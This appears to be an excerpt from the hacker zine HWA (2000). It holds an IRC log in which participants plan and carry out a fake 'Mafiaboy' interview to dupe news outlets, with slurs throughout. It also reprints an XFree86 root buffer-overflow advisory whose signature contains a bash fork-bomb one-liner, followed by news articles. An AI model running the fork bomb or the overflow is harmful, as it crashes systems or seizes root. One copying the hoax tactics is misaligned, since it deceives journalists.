gay [15:59] emmanuel is okIyAnsDV@2600.COM * Emmanuel Goldstein [15:59] emmanuel using irc.concentric.net Concentric Network Corporation [15:59] emmanuel has been idle 9hrs 11mins 39secs, signed on Thu May 18 03:45:18 [15:59] hmm [15:59] they breaks sticks with their but cheeks? [15:59] he gets media tho [15:59] dude [15:59] i doubt he'll buy it though [15:59] if u want the email letter i sent out [15:59] say yer email [15:59] i'll reply [15:59] and u guys forward it more to people [15:59] i did like 30 agencies now [15:59] I_am_the_real_gto@yahoo.com [16:00] Cruci, answer my msgs [16:00] k [16:02] might be fun if it doesn't fall apart [16:02] *** SLiPY sets mode: -o Debris [16:02] *** SLiPY sets mode: +o Debris [16:02] don't lose ops [16:02] heh [16:02] i did, it just got reset cuz the bot relinked to it [16:02] ok [16:02] debris [16:02] sorry bout that [16:02] bot trouble [16:02] i dont care heh [16:03] just only op bots [16:03] who is mafiaboy? [16:03] and keep the channel in lock down [16:03] hehe [16:03] its a secret [16:03] who is he? [16:03] a bot? [16:03] you want me to lock it? [16:03] Amoeba the real one? [16:03] an evil hacker [16:03] he DoS'd some big name websites off the net [16:03] yahoo and cnn [16:03] etc [16:04] don't forget to take flood protection off and scroll the TEXT SOURCE TO DeCSS in the channel. [16:05] fed #1 [16:05] [16:03] btw: talking with me is like talking directly to goverment ;-) [16:05] [16:03] * Nikkitaal *waves* on cybercops watching him [16:05] already id'd as hoax [16:05] anyone know him [16:13] heh [16:13] this is gonna be so much fun [16:13] and for fuck sakes [16:13] lets try to make this professional [16:13] how is it a hoax? [16:13] because mafiaboy won't really be here? [16:13] Bob, [16:13] Thanks for the note. I'm sure you understand my reservations. Is [16:13] there any way you can convince me this will be authentic? [16:13] Bob [16:13] hahaha [16:13] MSNBC [16:13] tell him that you are looking at him right now [16:13] no, nevermind [16:13] where would they be? [16:14] the feds? [16:14] bah [16:14] they can suck my dick [16:14] he is NASA security [16:14] i been raided already [16:14] [16:15] Slipy, they raided you? [16:15] yes [16:15] rcmp did [16:15] why? [16:15] who or what is rcmp? [16:15] *** SugarKing sets mode: +oo MrEreet SLiPY [16:15] royal canadian mounted police [16:15] oh [16:15] I'm not in canada [16:15] heh [16:15] we can tell [16:15] alright [16:15] bbiab [16:16] how would the be, ey? [16:16] the=that [16:16] *** flatline` has quit IRC (Ping timeout: 240 seconds) [16:16] haha [16:16] *** SugarKing has quit IRC (Leaving) [16:16] whats hwa's url [16:16] www.g-t-online.com [16:16] man [16:16] they emailed me back [16:16] saying they will be here [16:17] http://welcome.to/HWA.hax0r.news [16:17] hehehehehehheejh [16:17] who? [16:17] *** SLiPY is now known as YPiLS [16:17] can i have ops in chan plz [16:17] *** MrEreet is now known as Optik- [16:17] MSNBC [16:17] cool [16:17] *** Optik- is now known as MrEreet [16:18] don't forget to take flood protection off and scroll the TEXT SOURCE TO DeCSS in the channel. [16:18] we need to talk about [16:18] our future plans [16:19] and start a group [16:19] make it all up [16:19] but once we get a conf goin [16:19] we'll call mafia [16:20] what do you mean conference? [16:20] and I thought someone is going to act like amfia [16:20] mafia [16:20] oh we are [16:20] but we wanna talk to the real mafia [16:20] oh [16:21] I never talked to him [16:21] how old is he? [16:21] 15? [16:21] 15 [16:21] heh [16:21] will be mad fun [16:21] me too [16:21] I like to think of myself as 16 [16:21] we emailed [16:21] over 30 agencyes [16:21] msnbc has confirmed they will be here [16:22] opps [16:22] I never got a mail with your mail, so I can send it to more places [16:22] whats address [16:22] msnbc??? [16:22] i think 1 email fucked up [16:22] and said it couldn't be sent [16:22] get cnbc [16:22] I_am_the_real_gto@yahoo.com [16:22] what about ZDTV and ZDNET [16:23] emailed [16:23] but not replied [16:23] ok [16:23] ? [16:23] oh [16:23] this press release is rulling [16:23] what about wired news? [16:23] dude [16:23] you dont neeed that many [16:23] I hate to see what you do when you are more bored [16:23] all the online ones pick it up off of the wire [16:23] wired = emailed [16:23] zdnn replyed saying they got the tip [16:24] lol [16:25] so, can I have a part in this charade? [16:25] sure [16:25] we will introduce [16:25] the new group [16:25] heh [16:25] what kind of group? [16:25] and talk about our plans of chaos and deadly destruction [16:25] terrorisy [16:25] terrorist [16:25] brb [16:25] heh [16:25] we need to make this be good [16:25] gonna change my e-mail address so I don't get in trouble [16:25] *** Amoeba has quit IRC (ircN 7.24 + 7.0 for mIRC (2000/03/17 22.00)) [16:25] people bored yet? [16:25] heh [16:26] Thank you for sending your news tip to Wired News. We always welcome leads [16:26] that make our news informative and interesting. A reporter or editor may [16:26] follow up on this message with a request for more information. [16:26] fuck no [16:26] are u cruc? [16:27] *** Amoeba (GTO@dialup-*.net) has joined #media-admin [16:27] what time is it right now in EST? [16:27] thinking [16:27] Fri May 19 16:35:22 2000 [16:27] might have blown it [16:27] back [16:27] est [16:27] 4:37 est [16:27] Cruci, how? [16:27] this starts tommorow nite [16:27] 9pm EST [16:28] we haven't blown it, we just need to keep quite, either way its gonne be funny [16:28] if Nikitaal really is government then its blown [16:28] [16:03] btw: talking with me is like talking directly to goverment ;-) [16:28] [16:03] * Nikkitaal *waves* on cybercops watching him [16:28] yeah, he said it's a hoax [16:28] hes in my channel [16:28] -> [msg(Nikkitaal)] hey [16:28] -> [msg(Nikkitaal)] cybercop, suck my dick. [16:28] heh [16:28] man [16:28] he knew details on {}'s bust [16:28] cyber cops can't do shit [16:28] and {} left [16:28] well they can but oh well who cares [16:29] also think those splits were accidental? [16:29] they just installed sniffers [16:29] heheheheheheeh [16:29] no shit [16:29] {} and him talked like they knew each other [16:29] they did [16:29] hes a fed agent [16:30] {} said something about that guy being on his box and {} had to help him [16:30] guys [16:30] we aren't doing anything illegal [16:30] chill [16:30] I know [16:30] hehe [16:30] long as no one starts packetting cnn.com heh we're fine [16:30] just don't worry [16:31] isn't it a federal offense to run a hoax on the media, or something like that [16:31] no [16:31] not likely [16:31] its not like we're phonin 911 [16:31] with fake shit [16:32] yeah, and I have nothing to do with this [16:32] heh man [16:32] yer parnoid [16:32] i been raided and told to not even talk to my irc friends [16:32] i laughed [16:32] heh [16:33] well I can't get in trouble with the law [16:33] it would ruin my SAT scores [16:33] neither can i [16:33] if i was worried about this shit [16:33] i wouldn't do it [16:33] if i get caught doin anything illegal with computers i go straight to jail [16:34] hello [16:34] im from tivision (www.tiv.at), austrian tv channel [16:34] here we go. [16:34] lol [16:34] k so maybe he's just a pretend fed [16:34] hahaha [16:34] don't know don't care [16:35] I'm starving [16:35] we are nonprofit.. so what are you doing here? [16:35] gonna write yer name down on paper to make sure you get yer chance tommorow night to speak to him. [16:35] (need more info, maybe we can get it into our IT section on tuesday) [16:35] yeah.. but what exactly will happen? just questions for mafiaboy ? [16:35] well mafiaboy feels its important that the world knows what he did, he isn't really a bad person like the media is saying, they are saying he's a evil hacker and everything, when really [16:36] ok cool [16:36] he just feels its important to get the facts straight [16:36] heh [16:36] this is gonna be funny [16:36] i'll call the guy that is responsible for TIV IT [16:36] lol [16:36] *** fraggy (fraggy@*.home.com) has joined #media-admin [16:38] *** fraggy has quit IRC (la de da) [16:39] Slipy, I got 2 mails from you at the same time [16:39] heh [16:39] Should I send it to people? [16:40] Because you may have already done that [16:40] Alot of places will just get it from wired news [16:40] and wired news gets it from the people themselves [16:48] *** k-rad-bob has quit IRC (Ping timeout) [16:50] yeah [16:50] go for it [16:50] spread the word [16:50] just be professional [16:50] no [16:51] heh mafiaboy be online tonite [16:51] leete shit goin on [16:51] heh [16:53] *** Debris has quit IRC (Read error 60: Operation timed out) [16:54] Slipy, what if you already mailed a person? [16:54] what do u mean? [16:55] like if you already contacted a media company [16:55] and then I contact them [16:55] *** Debris (3223@*.net) has joined #media-admin [16:56] *** MrEreet sets mode: +o Debris [16:56] *** MrEreet sets mode: +o Amoeba [16:56] thank you [16:56] aye [16:56] what bout #HWA? [16:57] oh well [16:57] go for it [16:58] just keep it real [16:58] ok [16:58] tell no one even yer friends [16:58] its a hoax [16:58] I'll send them the mail you sent me [16:58] k [16:58] sounds good [16:58] need more drugs [16:59] -m the channel its too quiet [16:59] what about mtv? [16:59] I see no media [16:59] heh [16:59] truelife? [16:59] channel is +m [16:59] k [16:59] to keep the hoax quite [16:59] just deal wit it [16:59] heh [16:59] :-)) [16:59] Cruci, I am getting a cable modem [16:59] tommorow nite we get organized better [16:59] tomorrow [16:59] cool [16:59] bbl going out [16:59] aight man [16:59] keep the media attention up [16:59] but it isn't static [16:59] but the hoax down. [16:59] werd [17:00] * MrEreet snickers [17:01] * Amoeba eats a Snickers© [17:01] |ÆÆ8 [17:02] *** debris- (3223@2*.uu.net) has joined #media-admin [17:02] *** MrEreet sets mode: +o Debris [17:04] bbl [17:04] op me in thre other one [17:04] the press release is done [17:05] debris, can I see [17:05] im uploading it [17:05] wait [17:05] is that you too? [17:05] Debris is 3223@*.popsite.net * HEH? [17:05] or an imposter [17:05] free isp [17:05] *** Debris has quit IRC (Read error 54: Connection reset by peer) [17:06] *** MrEreet sets mode: +o debris- [17:06] dont talk in media-event [17:07] yo [17:07] i think z28 should play mafiaboy [17:07] can i chant "hoax" ? [17:07] i think z28 should play mafiaboy [17:07] i think z28 should play mafiaboy [17:07] i think z28 should play mafiaboy [17:07] u know [17:07] i really don't care [17:07] :) [17:07] we gonna hold auditions now? [17:07] heh [17:07] dude [17:07] trust me [17:08] z28 is the best at this [17:08] *** debris- changes topic to 'press release www1.thevortex.com' [17:08] oh i know I just don't want a fight to fuck it up [17:08] ask YPiLS he's mafiaboy [17:08] haha [17:08] i'm just watching now [17:08] already caused enuff shit [17:09] read the press release [17:10] heh [17:10] don't really want hwa involved [17:10] The channel will be moderated thus meaning, now questions will be directly posed to Mafiaboy. [17:10] ok z28 isnt doing it [17:10] now should be no [17:10] oh shit [17:10] yeah [17:10] b4 i go out [17:10] any chance [17:11] someone on a .montreal isp [17:11] could [17:11] pose? [17:11] debris i'm lookin yer way [17:11] ;) [17:11] already thought of that but wasn't saying anything [17:11] heh [17:11] we'll see [17:11] well i gotta jet [17:11] i'll talk more tonite [17:11] and try to get a conf up [17:11] have fun [17:11] with REAL mafiaboy [17:11] bbl [17:11] think anyone cares? [17:12] lol [17:12] io think the impending possibility of a retaliatory mass attack was more scary [17:12] the rules debris came up with say that any question the press would want to ask is not allowed [17:12] those are all the questions they ask [17:12] that makes it more legit [17:12] use gov-boi's site instead of hwa in the release [17:12] this isnt a fucking free for all [17:12] or something [17:12] we gotta act like were his godamn lawyers [17:13] ok [17:13] then get rid of the fucking black ass background [17:13] *** debris- sets mode: -o+b Amoeba *!*GTO@*.l3.net [17:13] *** Amoeba was kicked by debris- (death to you) [17:13] its not black [17:13] haha [17:13] don't ban him [17:13] he could spill the beans [17:13] in media-event [17:14] then ill ban him from media event [17:14] hes gay [17:14] wtf was that? [17:14] its not black [17:14] -Amoeba- Your message has been recorded, away for 10m45s (bored) [email:ntsecurity00@hotmail.com] [17:14] yes it is [17:14] no it isnt [17:14] BGCOLOR="#00002b" [17:14] fucking retarded fool [17:15] get rid of the background tag [17:15] well then you must be color blind [17:15] no [17:15] its fine [17:15] that might be screwing it up [17:15] ive done this before [17:15] I make webpages for a living [17:15] and that was no fucking reason to ban me [17:15] i create media hoaxes for a living [17:15] *** debris- sets mode: -b *!*GTO@*.vel3.net [17:15] *** Amoeba (GTO@dialup.net) has joined #media-admin [17:15] *** debris- sets mode: +o Amoeba [17:15] werd [17:16] i chose that color scheme for a specific reason, to keep it uniform with g0at security and hwa [17:16] yeh but remove hwa [17:16] it looks like this is part of an organization now [17:16] remove hwa? [17:16] yeh [17:16] now I am going to curse you, because you severly pissed me off [17:16] just have to release some aggression [17:16] you fucking piece of shit [17:16] what the fuck do you think you're doing? [17:16] you are the primortial ooze under my shoe [17:16] *** debris- sets mode: -o+b Amoeba *!*GTO@*.Level3.net [17:16] *** Amoeba was kicked by debris- (sigh) [17:17] *** debris- sets mode: -b *!*GTO@*.Level3.net [17:17] you sure you want hwa out of it [17:17] yup [17:17] oki [17:47] www1.thevortex.com [17:47] too good:) A website was used to post the details of the 'press release' and this was posted in the channel topic... Version #1 05/19/00 - Mafiaboy online press conference http://www.goat-advisory.org g0at security in conjunction with hwa.hax0r.news are pleased to announce a Q and A session with alleged hacker, Mafiaboy. Welcome members of the press and all interested parties. Saturday, May 20 2000, members of the press and the general public have the oppurtunity to query the alleged hacker responsible for the attacks on yahoo.com. The interview will begin promptly at 9:00pm EST on the given date on the Eris FreeNet's IRC (Internet Relay Chat) network dubbed, EFnet (instructions on connecting follow). In order to connect to EFnet, please follow these easy steps Visit http://www.mirc.com mIRC.com and download the latest version of the mIRC internet relay chat client. http://home.vpi.net/~hawk/mirc571t.exe Win95/98/00/NT http://home.vpi.net/~hawk/mirc571s.exe Win3.1/3.11 Upon completion of the download, execute the mIRC self-extracting file and install it (it is extremely simple, just follow the instructions Execute the mIRC client. After the splash page, a window should pop up with empty fields. It is very important that you follow these instructions carefully or you will not be admitted into the interview. The window you see, will be labeled 'connect'. Where it is written 'full name', please proceed to input your full name. In the 'e-mail' field, put you're real e-mail address. Under 'nickname', please put the abreviated name of the agency you represent. In the 'alternative' field, please enter the same nickname you have entered, followed by a '-'. Ex) Nickname: BNN | Alternative: BNN-. Next, making sure the minus sign is visible beside the connect option (if it is not, double click it), select the ident section (a sub-option of connect). Select the inable ident server option on the right of your screen. Under USER ID, enter the full name of the agency you represent. Click the ok button at the bottom of your screen. A blank screen should now be in front of you. At the bottom of this screen there should be a text box. In this box type the following to connect to EFnet. /server irc.idle.net and click enter. This should connect you to EFnet. If this does not work, use one of the following alternatives to irc.idle.net: irc.lsl.com, irc.nethead.com, irc.prison.net, irc.concentric.net, irc.freei.net, irc.core.com. A grey window will pop-up once you connect with a list of room names. At the top, type #media-event and click the join button. You are now connected. The interview will engage as follows. The channel will be moderated thus meaning, now questions will be directly posed to Mafiaboy. At the beginning of the interview, the nickname of the thirdparty will be divulged. All questions should be asked towards the third party. In order to do so, double click the third party's nickname on the right side of the window and enter your question. Questions will be answered on a first come first serve basis. We ask that you pose one question at a time to give a chance to others. The following is not to be asked and doing such will result in immediate expulsion from the interview: names of accomplices, Mafiaboy's real name, technical questions concerning the tools used and questions concerning the servers involved in the attacks. We also ask that you only message the moderator. Messaging any other of the channel operators including mafiaboy will result in expulsion from the interview. If we find that you are not following one or more rules including the connecting rules, you will be expelled. - g0at security/hwa.hax0r.news Version #2 05/19/00 - Mafiaboy online press conference http://www.goat-advisory.org g0at security is pleased to announce a Q and A session with alleged hacker, Mafiaboy. Welcome members of the press and all interested parties. Saturday, May 20 2000, members of the press and the general public have the oppurtunity to query the alleged hacker responsible for the attacks on yahoo.com. The interview will begin promptly at 9:00pm EST on the given date on the Eris FreeNet's IRC (Internet Relay Chat) network dubbed, EFnet (instructions on connecting follow). In order to connect to EFnet, please follow these easy steps Visit http://www.mirc.com mIRC.com and download the latest version of the mIRC internet relay chat client. http://home.vpi.net/~hawk/mirc571t.exe Win95/98/00/NT href="http://home.vpi.net/~hawk/mirc571s.exe Win3.1/3.11 Upon completion of the download, execute the mIRC self-extracting file and install it (it is extremely simple, just follow the instructions Execute the mIRC client. After the splash page, a window should pop up with empty fields. It is very important that you follow these instructions carefully or you will not be admitted into the interview. The window you see, will be labeled 'connect'. Where it is written 'full name', please proceed to input your full name. In the 'e-mail' field, put you're real e-mail address. Under 'nickname', please put the abreviated name of the agency you represent. In the 'alternative' field, please enter the same nickname you have entered, followed by a '-'. Ex) Nickname: BNN | Alternative: BNN-. Next, making sure the minus sign is visible beside the connect option (if it is not, double click it), select the ident section (a sub-option of connect). Select the inable ident server option on the right of your screen. Under USER ID, enter the full name of the agency you represent. Click the ok button at the bottom of your screen. A blank screen should now be in front of you. At the bottom of this screen there should be a text box. In this box type the following to connect to EFnet. /server irc.idle.net and click enter. This should connect you to EFnet. If this does not work, use one of the following alternatives to irc.idle.net: irc.lsl.com, irc.nethead.com, irc.prison.net, irc.concentric.net, irc.freei.net, irc.core.com. A grey window will pop-up once you connect with a list of room names. At the top, type #media-event and click the join button. You are now connected. The interview will engage as follows. The channel will be moderated thus meaning, nowquestions will be directly posed to Mafiaboy. At the beginning of the interview, the nickname of the thirdparty will be divulged. All questions should be asked towards the third party. In order to do so, double click the third party's nickname on the right side of the window and enter your question. Questions will be answered on a first come first serve basis. We ask that you pose one question at a time to give a chance to others. The following is not to be asked and doing such will result in immediate expulsion from the interview: names of accomplices, Mafiaboy's real name, technical questions concerning the tools used and questions concerning the servers involved in the attacks. We also ask that you only message the moderator. Messaging any other of the channel operators including mafiaboy will result in expulsion from the interview. If we find that you are not following one or more rules including the connecting rules, you will be expelled. - g0at security [17:58] flow with it [17:58] who all was contacted anyway? [17:58] the list i posted and who else? [17:58] i dunno [18:00] hehe [18:00] slipy better get back soon to give the url to the media [18:01] he said 30 agencys were notified [18:01] what was the reply email though? [18:01] we wont see responses until late tonight or tomorrow [18:01] he got one from msnbc and zdnet [18:02] and wired? [18:02] dunno [18:02] shit [18:02] we should contact the montrealgazette [18:02] i could contact them all again but i don't want to tarnish my rep if it blows up [18:02] heh [18:03] because their coverage of mafiaboy gets wired on southempress which owns all the news papers in canada [18:05] u know it really is a good opportunity for some underground propaganda and statements clearning up bs like ILOVEYOU virus and DeCSS issues from ppl in the scene [18:05] dude [18:05] keep it simple [18:05] well i'm resigned to that now [18:05] just keep it pure mafiaboy and it will make the news [18:06] then we will announce the hoax [18:06] yeh [18:06] like the next day [18:06] they're gonna be bullshit [18:06] heh [18:06] needs a twist tho [18:06] or at least a good message [18:06] just let them ask their questions, answer them intelligently and etc [18:06] not just a hoax for the sake of pulling it off [18:06] ill set up a goat-advisory.org bnc for mafiaboy [18:06] nod [18:08] biagb [18:08] -g [18:09] btw typo_ is media [18:09] this fucking sub wrap thing is messy as fuck [18:09] oh [18:09] shit [18:09] a .at tv show [18:09] oh good [18:09] not even english [18:09] now i'm gay [18:09] omg [18:09] OMG [18:09] rofl [18:10] heg [18:10] heh [18:10] [18:09] yo [18:10] [18:10] is this a hoax or not ? [18:10] ask who he is first [18:10] *** debris- is now known as Debris [18:12] [18:10] btw I am patrick from security.nl [18:12] wtf is security.nl [18:12] [18:12] whom did you send the press release to ? [18:13] crap [18:13] security.nl? [18:13] fuck just tell him to message me ill shut him up [18:14] told him to msg ya [18:15] he's not messaging me [18:15] i must have started shit with him sometime in the past [18:18] guess he doesn't wanna talk to you [18:18] hrm [18:20] no more info needed at this time. tnx [18:20] uh... [18:22] heh [18:25] *** YPiLS has quit IRC (Ping timeout: no data for 251 seconds) [18:26] *** i0 (i0@*.no) has joined #media-admin [18:32] Anything new [18:32] chatting with the security dude [18:32] cool guy [18:34] heh [18:35] can't wait [18:35] away back to resident evil (Off/l)(Off/p) (salman@*.com/e) (37543014/uin) [18:49] * Debris is away, went out [log:OFF] [page:OFF] [19:02] [19:07] *** Joins: VetesGirl (Destiny@dyn1-tnt2-206.*.ameritech.net) [19:02] heh [19:02] hmm [19:02] left [19:02] some leet types have joined and split [19:07] is there any shit in the news yet? [19:07] doubt it [19:07] real media will try to contact mafiaboy by phone and he will say he knows nothing about it. [19:08] thats my guess anyay [19:08] it will get mentioned tho [19:08] sentence or two somewhere [19:14] I just woke up [19:25] fucking unreal i can barely stand all this excitement [19:26] should I stir things up a bit or leave it alone? [19:29] leave it [19:29] you don't wanna hype it up that much [19:37] returned (*yawn*) (1h2m50s) [19:39] but [19:39] I'm bored [19:42] how'd you hype it more? [19:45] another thing that would generate media interest is to start discussion about it on various web message boards [19:46] if public shows interest media will pay more attention [19:46] so hit news sites and stuff [19:48] maybe someone should post it to packetstorm and bugtraq? [19:48] anti already got mail sent to i think [19:48] anyone have slashdot access? [19:49] i forgot my pw on slash =\ [19:58] heh [19:58] this is funny [19:58] hrm.. in the ss.. which division do you suppose would handle an event like this? [19:58] they mailed back? [19:58] yep [19:59] heh, coolter there [19:59] ah [19:59] anyone else replied back yet? [19:59] no idea my email wasn't used [19:59] :( [20:10] *** sku|| (seksi@dial*.freei.net) has joined #media-admin [20:10] werd [20:18] y0 [20:19] hi [20:19] MrEreet: sku||.....is a whore [20:19] haha [20:19] *** SugarKing sets mode: +v sku|| [20:19] he knows [20:23] *** YPiLS has quit IRC (Ping timeout: no data for 247 seconds) [20:27] back [20:34] *** Amoeba has quit IRC (Ping timeout) [20:36] *** Amoeba (GTO@dialup-*.Level3.net) has joined #media-admin [20:41] -=- [20:41] 20:33] hope you know. [20:41] [20:33] you arent interviewing the 'real' mafiaboy [20:41] [20:33] how do you know this? [20:41] [20:33] because i fucking KNOW MAFIABOY. [20:41] - [20:41] [20:34] will he talk on phone? [20:41] [20:35] you wont get to talk with him AT ALL [20:41] [20:35] fine fuck off then. [20:41] - [20:42] don;t need attitude [20:42] [20:35] IGNORED [20:42] [20:35] i'm not giving you an attitude [20:42] [20:35] i'm just emphasizing those words. [20:42] [20:35] frankly i don't even care [20:42] [20:35] i'm just letting you know [20:42] [20:35] thanks [20:42] - [20:42] 20:36] you wont be getting an interview. [20:42] [20:36] well yeah sure you will [20:42] [20:36] but it wont be with 'mafiaboy' [20:42] [20:36] believe me I have enough info in my zine already [20:42] [20:36] i could care less personally [20:42] [20:36] he has no skill [20:42] [20:36] enough info in your zine? [20:42] [20:36] no concern of mine [20:42] - [20:42] [20:38] ok.. who is the person incharse? [20:42] [20:38] incharge [20:42] [20:38] debris [20:42] [20:39] check the "press release" in the channel topic [20:43] - [20:44] xzrg is ~regg@*.monmouth.com * americunt hair pie [20:44] xzrg on #media-event @#shellz #shells [20:44] xzrg using irc.concentric.net Concentric Network Corporation [20:44] xzrg has been idle 7 secs, signed on Fri May 19 14:52:11 [20:44] - [20:51] hahaha [20:51] guess who that is [20:52] who? [20:52] it IS mafiaboy's friend [20:52] lol [20:52] he was dossing as well [20:52] but didn't get caught [20:52] so, is he gonna keep the secret? [20:52] he was? [20:52] yeh [20:52] ya [20:52] what program did they use? [20:52] zombies? [20:52] tfn [20:53] tribal flood network [20:53] see, I know the technical terminology and programs [20:53] yep [20:53] mixter wrote it [20:53] yeah [20:53] and is the real mixter on? [20:53] ya [20:54] cool [20:54] mixter_ thats him [20:54] oh [20:54] he's away [20:54] tuesday may 16th [20:54] #!b0f [20:55] http://b0f.freeBSD.lublin.pl/ [20:55] what is that for? [20:55] oh [20:55] bbl [20:56] ok [21:24] *** sku|| has quit IRC (irc-w.frontiernet.net irc.Prison.NET) [21:32] fucking packet kiddies [21:32] lol [21:53] ? [21:58] *** Debris has quit IRC (Read error 54: Connection reset by peer) [23:00] *** i0 has quit IRC (Hiroshima 45, Chernobyl 86, Windows 98) [23:02] *** Debris (3223@*.uu.net) has joined #media-admin [23:02] *** MrEreet sets mode: +o Debris [23:17] *** Amoeba (GTO@dialup-*.Level3.net) has left #media-admin [23:22] *** SugarKing has quit IRC (Leaving) Later on the press release site this was posted... -=- IT'S A HOAX This has been a g0at security attempt at getting hits to our currently down, webpage. Although the page is not active at the current instance. Please try it again sometime in the near future. And for those stupid people, no mafiaboy is not giving an interview. END @HWA 224.0 [IND] XFree86 3.3.6 buffer overflow to root compromise ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Buqtraq XFree86 3.3.6 (and probably 4.0.0 as well ;) - by running X server (no matter it's setuid, or called from setuid Xwrapper - works in both cases, seems to me Xwrapper in default RH 6.x distro is rather dumb ;) with -xkbmap parameter and over 2100 of 'A's (or shellcode, again, it's rather trivial to exploit :), you'll get beautiful overflow with root privledges in main (Xserver) process... listen to the gdb... Cannot access memory at address 0x41414141. This has been tested both with recent RH6.1/6.2 Xservers (3.3.5/3.3.6), and: XFCom_i810 Version 1.0.0 / X Window System (protocol Version 11, revision 0, vendor release 6300) Release Date: October 13 1999 Btw. while testing this bug, we have noticed strange behaviour of some drivers. For example, in one case we get kernel oops, just like that (linux 2.2.14, XFree86 3.3.6 XF86_S3V): eip: 41414141 eflags: 00013296 eax: 00000000 ebx: 00000000 ecx: 00000bb8 edx: 00000009 esi: bfffe92c edi: 00000400 ebp: 00000000 esp: bfffe464 Stack: 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 :) _______________________________________________________ Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security] [http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};: =-----=> God is real, unless declared integer. <=-----= @HWA 225.0 [MM] Power your PC with a potato! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://news.bbc.co.uk/hi/english/sci/tech/newsid_759000/759529.stm Potato-powered computer Chips with everything, even potatoes By BBC News Online internet reporter Mark Ward UK technology enthusiasts have found a way to power a computer using potatoes. The computer fans, who run a website called Temple ov thee Lemur, decided to build the spud server because someone bet them that it could not be done. Although science kits that power a digital clock off a potato or two are available, few people have tried anything larger. Steve Harris, spokesman for the group, said to lighten the load on the potato power pack the group had first to make a low power version of a web server. Surfers limited These computers are usually powerful, high-memory versions of the PCs people have on their desks. But there was no way a bag of potatoes would provide enough power for one of those, said Mr Harris. For the server the group cannibalised an old computer containing a low-power Intel 386 chip. They removed everything but the central chip and its associated circuitry. The place of the hard disk was taken by another custom-built chip that had the server software and the two pages of the website permanently "burned" into it. Even this small server needs around 12 potatoes to power it and the spuds have to be changed every couple of days. Each potato generates about half a volt. The web pages hosted by the server can be browsed but the machine limits the number of people that can view it every minute to ensure it is not overwhelmed. Limited hardware Potatoes can be used as batteries because the flesh of the vegetable acts as a very thick electrolyte - like the acid in a car battery. When electrodes made of zinc and copper are stuck into the potato the electrochemical reaction produces a power flow. The salty flesh of the potato allows ions to cross from one electrode to another. Pictures of the potato-powered server are available but Mr Harris said they were taken when the system was not switched on. "The power connectors were plugged in the wrong way round and it would have been fatal to the hardware if it had been live," he said. The spud server is the latest in a series of attempts by technology fans to get the most out of very limited hardware. A Dutch company is making web servers using old Commodore 64 computers that were popular in the mid-1980s. Several web servers are run off old Amiga computers and there is even a project to turn hand held computers such as the Palm into low volume web servers. -=- Subject: Potatoe run server ;) Author: BHZ Date: 05-24-2000 19:12 http://152.78.65.48:2300 is the addy :) UK technology enthusiasts have found a way to power a computer using potatoes. The computer fans, who run a website called Temple ov thee Lemur, decided to build the spud server because someone bet them that it could not be done. Although science kits that power a digital clock off a potato or two are available, few people have tried anything larger. Steve Harris, spokesman for the group, said to lighten the load on the potato power pack the group had first to make a low power version of a web server. [http://news.bbc.co.uk/hi/english/sci/tech/newsid_759000/759529.stm] @HWA 226.0 [MM] Mobile phones fertile for E-bugs ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.newscientist.com/news/news_223928.html Is your phone infected? Mobiles are fertile ground for e-bugs of the future IN THE wake of the Love Bug virus attack, computer scientists are warning that future viruses aimed at intelligent mobile phones and personal digital assistants (PDAs) may be even worse. They could record your conversations and forward them to others, delete money from "electronic wallets", or perhaps rack up huge telephone bills. "These viruses could spread rapidly in future," predicts David Chess, an antivirus researcher at IBM's T. J. Watson Research Center in Yorktown Heights, New York. Computer viruses attack devices that are programmable, and spread when there is some link between one device and another. Early viruses spread mainly via infected discs handed from user to user. Today the main avenue of infection is by e-mail. "The thing that makes viruses a threat is that we're so well connected," says Charles Palmer, a specialist in network security and cryptography research at IBM. This suggests there is a huge potential for viruses to spread via future programmable mobiles. In current and next-generation phones, and in PDAs, designers have several ways to prevent virus damage. First, they can limit the devices' programmability, leaving them without the capacity to run viruses. Current phones already fall into this category--but future generations will be much more capable. Another option is to store important programs in read-only memory so that a virus cannot overwrite them. "The drawback then is that the phone cannot be upgraded," says Edward Felton, a computer scientist at the Secure Internet Programming Laboratory at Princeton University in New Jersey. And this strategy cannot protect data that the user adds, as it must be stored in a writable memory. "A virus that changes your mom's number to a premium-rate number in Nigeria could rack up huge bills," says Palmer. Finally, it is possible to ensure that a phone's built-in programs are separate, so that one program cannot start another. If the virus cannot dial out, it cannot spread. But researchers say there is huge pressure on cellphone designers to add functions, and that this will increase the chances of infection. "If somebody sends you a telephone number by e-mail, you want to be able to click on that number to dial it," says Avi Ruben, a specialist in Internet security at the AT&T Laboratories in Florham Park, New Jersey. "I know that there are prototypes in development that allow this kind of threat," adds Felton. When e-mail attachments can trigger other applications, they could dial out, start recording software for personal surveillance, or wipe out the contents of files such as electronic wallets. However, Charles Davies, chief technology officer for the British PDA maker Psion, argues that this scenario is unlikely, at least for devices that run the widely used EPOC operating system, which he helped to design. "I don't want to seem smug or complacent but I just don't see it as a big threat," he says. Palmer sees the way forward in mathematical proofs that show whether a system is secure, and calls for more research into the area. "It's the only choice we have in the long run," he says. Justin Mullins @HWA 227.0 [MM] The virtual threat ~~~~~~~~~~~~~~~~~~~~~~~ http://www.economist.com/editorial/freeforall/current/index_survey.html THE most remarkable thing about the effect of the Internet on the financial-services sector is not how pervasive it has been; it is how limited a transformation it has so far wrought. Financial institutions, after all, deal in a product—money—that for many of their customers has long been “virtual”. Bank-account holders are used to the notion that their cash is represented by a series of numbers on a monthly statement generated by a computer, or by the glowing green figures of a cash machine. And they have become accustomed to making payments using pieces of plastic backed with a clever magnetic strip. The Internet might have been designed for the distribution, monitoring and management of this ubiquitous electronic commodity. More worryingly for the firms that make their living out of arranging financial transactions, the Internet might also have been designed to do away with them. Banks and other financial firms are intermediaries, standing between lenders and borrowers, savers and spenders. For decades, banks in rich countries have been fretting about how to cope with “disintermediation”: lenders dealing direct with borrowers (as many do already in the capital markets), without using a bank’s balance sheet to add a layer of cost. The Internet is, potentially, the greatest force for disintermediation the banks have ever had to tackle. Other intermediaries, such as retailers, face the same problem. But money, 